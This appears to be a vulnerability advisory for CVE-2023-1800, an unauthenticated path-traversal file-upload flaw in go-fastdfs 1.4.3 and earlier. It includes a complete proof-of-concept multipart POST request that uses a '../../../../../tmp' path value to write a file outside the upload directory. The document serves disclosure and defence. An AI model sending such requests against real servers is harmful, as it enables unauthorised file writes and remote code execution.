Headline

CVE-2023-1800: ForCVE/2023-0x05.md at main · yangyanglo/ForCVE

A vulnerability, which was classified as critical, has been found in sjqzhang go-fastdfs up to 1.4.3. Affected by this issue is the function upload of the file /group1/uploa of the component File Upload Handler. The manipulation leads to path traversal: '…/filedir’. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224768.

1 year ago

CVE

Open in Source

#vulnerability #web #windows #apple #js #git #auth #chrome #webkit

go-fastdfs Arbitrary file upload vulnerability

go-fastdfs is a distributed file system based on the http protocol. It is based on the design concept of avenues to simplicity. All simple designs make its operation and maintenance and expansion easier. It has high performance, high reliability, no center, Maintenance-free and other advantages. There is an arbitrary file upload vulnerability in go-fastdfs version 1.4.3 and before. Unauthenticated attackers can directly upload arbitrary files to the system to achieve the purpose of remotely executing commands.

https://github.com/sjqzhang/go-fastdfs/

version go-fastdfs <= v1.4.3

POST /group1/upload HTTP/1.1
Host: ip:8080
Content-Length: 951
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream

success
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="scene"

default
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="filename"

test
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="output"

json2
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="path"

../../../../../tmp
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="auth_token"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryigj9M9EJykZc9u53--

Vulnerability analysis：

This place does not filter the path, resulting in path traversal